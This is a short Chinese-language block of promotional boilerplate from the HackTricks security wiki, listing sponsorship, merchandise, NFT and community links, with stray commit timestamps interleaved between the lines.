* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
2024-02-08 04:42:06 +00:00
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
2024-02-09 08:58:25 +00:00
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )上**关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
2023-04-17 15:16:32 +00:00
< / details >
